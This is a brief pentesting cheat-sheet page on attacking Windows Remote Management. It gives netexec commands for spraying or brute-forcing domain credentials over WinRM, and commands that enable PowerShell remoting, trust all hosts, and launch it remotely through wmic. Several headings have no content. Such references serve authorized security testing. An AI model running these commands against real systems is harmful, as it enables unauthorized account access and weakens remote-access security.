WinRM
Pentesting WinRM - TCP Ports 5985,5986
Theory
Practice
Targeting Accounts
netexec winrm <IP> -d <Domain Name> -u <userlist> -p <passwlist>netexec winrm <IP> -d <Domain Name> -u <userlist> -p 'Passw0rd!'Enable WinRM
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"#Check locally
Test-WSMan
#Check remotely
Test-WSMan -ComputerName <TARGET>Execute Remote Commands
WinRMResources
Last updated